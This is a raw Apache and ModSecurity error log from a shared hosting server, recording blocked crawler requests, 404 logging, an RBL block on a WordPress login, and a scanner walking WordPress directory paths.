[Tue May 26 17:02:53.249340 2026] [security2:error] [pid 851641:tid 851893] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWE5Bp8QSN2510avp4fIgAAAHo"]
[Tue May 26 17:02:55.030131 2026] [security2:error] [pid 851641:tid 851830] [client 157.245.139.219:56045] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWE5xp8QSN2510avp4fUQAAADs"]
[Tue May 26 17:02:55.940116 2026] [security2:error] [pid 851641:tid 851837] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWE5xp8QSN2510avp4fVwAAAEI"]
[Tue May 26 17:02:56.784522 2026] [security2:error] [pid 851641:tid 851825] [client 94.31.93.144:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWE6Bp8QSN2510avp4fZgAAADY"]
[Tue May 26 17:02:57.340133 2026] [security2:error] [pid 851641:tid 851872] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWE6Bp8QSN2510avp4fdwAAAGU"]
[Tue May 26 17:02:59.747446 2026] [security2:error] [pid 851641:tid 851804] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWE6xp8QSN2510avp4fsgAAACE"]
[Tue May 26 17:02:59.792700 2026] [security2:error] [pid 851641:tid 851784] [client 85.208.96.198:45062] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/3/"] [unique_id "ahWE6xp8QSN2510avp4fwgAAAA0"]
[Tue May 26 17:02:59.792808 2026] [security2:error] [pid 851641:tid 851784] [client 85.208.96.198:45062] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/3/"] [unique_id "ahWE6xp8QSN2510avp4fwgAAAA0"]
[Tue May 26 17:03:02.385345 2026] [security2:error] [pid 851641:tid 851821] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWE7Rp8QSN2510avp4gBQAAADI"]
[Tue May 26 17:03:04.257302 2026] [security2:error] [pid 851641:tid 851810] [client 157.245.139.219:57164] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWE8Bp8QSN2510avp4gUQAAACc"]
[Tue May 26 17:03:04.418073 2026] [security2:error] [pid 851641:tid 851863] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWE7xp8QSN2510avp4gSwAAAFw"]
[Tue May 26 17:03:04.436859 2026] [security2:error] [pid 851641:tid 851836] [client 157.245.139.219:59861] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWE8Bp8QSN2510avp4gWAAAAEE"]
[Tue May 26 17:03:05.792417 2026] [security2:error] [pid 851641:tid 851835] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWE8Rp8QSN2510avp4gcQAAAEA"]
[Tue May 26 17:03:06.556005 2026] [security2:error] [pid 851641:tid 851785] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWE8hp8QSN2510avp4gfwAAAA4"]
[Tue May 26 17:03:07.387890 2026] [security2:error] [pid 851641:tid 851738] [remote 45.79.189.31:34906] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.189.79.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWE8xp8QSN2510avp4glgAACmA"]
[Tue May 26 17:03:08.382265 2026] [security2:error] [pid 851641:tid 851888] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWE8xp8QSN2510avp4gpwAAAHU"]
[Tue May 26 17:03:08.765664 2026] [security2:error] [pid 851641:tid 851795] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWE9Bp8QSN2510avp4gtAAAABg"]
[Tue May 26 17:03:09.675322 2026] [security2:error] [pid 851641:tid 851826] [client 157.245.139.219:59902] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/website/wp-includes/wlwmanifest.xml"] [unique_id "ahWE9Rp8QSN2510avp4g-wAAADc"]
[Tue May 26 17:03:10.469040 2026] [security2:error] [pid 851641:tid 851874] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWE9hp8QSN2510avp4hBQAAAGc"]
[Tue May 26 17:03:12.921640 2026] [security2:error] [pid 851641:tid 851830] [client 157.245.139.219:61269] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWE-Bp8QSN2510avp4hUQAAADs"]
[Tue May 26 17:03:13.198139 2026] [security2:error] [pid 851641:tid 851804] [client 5.255.99.53:57282] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWE-Bp8QSN2510avp4hVQAAACE"]
[Tue May 26 17:03:13.277040 2026] [security2:error] [pid 851641:tid 851771] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWE-Bp8QSN2510avp4hTQAAAAA"]
[Tue May 26 17:03:13.843434 2026] [autoindex:error] [pid 851641:tid 851772] [client 138.199.19.160:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-content/uploads/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:03:13.844120 2026] [security2:error] [pid 851641:tid 851772] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWE-Rp8QSN2510avp4hawAAAAE"]
[Tue May 26 17:03:13.844503 2026] [security2:error] [pid 851641:tid 851806] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/wp-content/uploads/"] [unique_id "ahWE-Rp8QSN2510avp4haAAAACM"]
[Tue May 26 17:03:14.099160 2026] [autoindex:error] [pid 851641:tid 851887] [client 138.199.19.160:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-includes/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:03:14.099868 2026] [security2:error] [pid 851641:tid 851887] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWE-hp8QSN2510avp4hbwAAAHQ"]
[Tue May 26 17:03:14.101896 2026] [security2:error] [pid 851641:tid 851856] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/wp-includes/"] [unique_id "ahWE-hp8QSN2510avp4hbQAAAFU"]
[Tue May 26 17:03:14.383054 2026] [autoindex:error] [pid 851641:tid 851773] [client 138.199.19.160:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-includes/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:03:14.383736 2026] [security2:error] [pid 851641:tid 851773] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWE-hp8QSN2510avp4hfgAAAAI"]
[Tue May 26 17:03:14.384147 2026] [security2:error] [pid 851641:tid 851870] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/wp-includes/css/"] [unique_id "ahWE-hp8QSN2510avp4hfAAAAGM"]
[Tue May 26 17:03:14.689330 2026] [autoindex:error] [pid 851641:tid 851879] [client 138.199.19.160:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:03:14.689965 2026] [security2:error] [pid 851641:tid 851879] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWE-hp8QSN2510avp4hggAAAGw"]
[Tue May 26 17:03:14.690376 2026] [security2:error] [pid 851641:tid 851888] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/wp-includes/ID3/"] [unique_id "ahWE-hp8QSN2510avp4hfwAAAHU"]
[Tue May 26 17:03:14.966620 2026] [autoindex:error] [pid 851641:tid 851866] [client 138.199.19.160:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-includes/IXR/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:03:14.967363 2026] [security2:error] [pid 851641:tid 851866] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWE-hp8QSN2510avp4hkwAAAF8"]
[Tue May 26 17:03:14.967758 2026] [security2:error] [pid 851641:tid 851849] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/wp-includes/IXR/"] [unique_id "ahWE-hp8QSN2510avp4hkAAAAE4"]
[Tue May 26 17:03:15.176938 2026] [security2:error] [pid 851641:tid 851850] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWE-hp8QSN2510avp4hiAAAAE8"]
[Tue May 26 17:03:15.215363 2026] [autoindex:error] [pid 851641:tid 851772] [client 138.199.19.160:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:03:15.215993 2026] [security2:error] [pid 851641:tid 851772] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWE-xp8QSN2510avp4hnwAAAAE"]
[Tue May 26 17:03:15.216375 2026] [security2:error] [pid 851641:tid 851808] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/wp-includes/Requests/"] [unique_id "ahWE-xp8QSN2510avp4hnQAAACU"]
[Tue May 26 17:03:15.685378 2026] [autoindex:error] [pid 851641:tid 851871] [client 138.199.19.160:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:03:15.686009 2026] [security2:error] [pid 851641:tid 851871] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWE-xp8QSN2510avp4hrgAAAGQ"]
[Tue May 26 17:03:15.686453 2026] [security2:error] [pid 851641:tid 851841] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/wp-includes/SimplePie/"] [unique_id "ahWE-xp8QSN2510avp4hqwAAAEY"]
[Tue May 26 17:03:15.930611 2026] [autoindex:error] [pid 851641:tid 851896] [client 138.199.19.160:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-includes/Text/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:03:15.931357 2026] [security2:error] [pid 851641:tid 851896] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWE-xp8QSN2510avp4hsQAAAH0"]
[Tue May 26 17:03:15.931846 2026] [security2:error] [pid 851641:tid 851801] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/wp-includes/Text/"] [unique_id "ahWE-xp8QSN2510avp4hrwAAAB4"]
[Tue May 26 17:03:17.392233 2026] [security2:error] [pid 851641:tid 851852] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWE_Bp8QSN2510avp4h3wAAAFE"]
[Tue May 26 17:03:17.783706 2026] [security2:error] [pid 851641:tid 851830] [client 138.199.19.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWE_Bp8QSN2510avp4hwAAAADs"]
[Tue May 26 17:03:17.783728 2026] [security2:error] [pid 851641:tid 851830] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWE_Bp8QSN2510avp4hwAAAADs"]
[Tue May 26 17:03:17.792224 2026] [security2:error] [pid 851641:tid 851824] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/wp-content/mu-plugins-old/"] [unique_id "ahWE_Bp8QSN2510avp4hvAAAADU"]
[Tue May 26 17:03:17.936479 2026] [security2:error] [pid 851641:tid 851801] [client 5.255.99.53:57282] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWE_Rp8QSN2510avp4h9QAAAB4"]
[Tue May 26 17:03:18.428028 2026] [security2:error] [pid 851641:tid 851820] [client 138.199.19.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWE_hp8QSN2510avp4iHAAAADE"]
[Tue May 26 17:03:18.428055 2026] [security2:error] [pid 851641:tid 851820] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWE_hp8QSN2510avp4iHAAAADE"]
[Tue May 26 17:03:18.447758 2026] [security2:error] [pid 851641:tid 851800] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/wp-content/themes/classic/inc/"] [unique_id "ahWE_hp8QSN2510avp4iGgAAAB0"]
[Tue May 26 17:03:19.076548 2026] [security2:error] [pid 851641:tid 851890] [client 138.199.19.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWE_hp8QSN2510avp4iLwAAAHc"]
[Tue May 26 17:03:19.076574 2026] [security2:error] [pid 851641:tid 851890] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWE_hp8QSN2510avp4iLwAAAHc"]
[Tue May 26 17:03:19.077187 2026] [security2:error] [pid 851641:tid 851781] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/wp-content/plugins/ninja-forms/"] [unique_id "ahWE_hp8QSN2510avp4iLQAAAAo"]
[Tue May 26 17:03:19.390279 2026] [autoindex:error] [pid 851641:tid 851822] [client 138.199.19.160:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-content/mu-plugins/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:03:19.390935 2026] [security2:error] [pid 851641:tid 851822] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWE_xp8QSN2510avp4iPAAAADM"]
[Tue May 26 17:03:19.391386 2026] [security2:error] [pid 851641:tid 851852] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/wp-content/mu-plugins/"] [unique_id "ahWE_xp8QSN2510avp4iOgAAAFE"]
[Tue May 26 17:03:19.678594 2026] [autoindex:error] [pid 851641:tid 851859] [client 138.199.19.160:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-includes/Text/Diff/Renderer/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:03:19.679543 2026] [security2:error] [pid 851641:tid 851859] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWE_xp8QSN2510avp4iRgAAAFg"]
[Tue May 26 17:03:19.679996 2026] [security2:error] [pid 851641:tid 851792] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/wp-includes/Text/Diff/Renderer/"] [unique_id "ahWE_xp8QSN2510avp4iRAAAABU"]
[Tue May 26 17:03:19.807726 2026] [security2:error] [pid 851641:tid 851887] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWE_xp8QSN2510avp4iOQAAAHQ"]
[Tue May 26 17:03:20.103938 2026] [security2:error] [pid 851641:tid 851817] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/wp-includes/blocks/index.php"] [unique_id "ahWFABp8QSN2510avp4iUAAAAC4"]
[Tue May 26 17:03:20.104338 2026] [security2:error] [pid 851641:tid 851810] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/wp-includes/blocks/"] [unique_id "ahWFABp8QSN2510avp4iTgAAACc"]
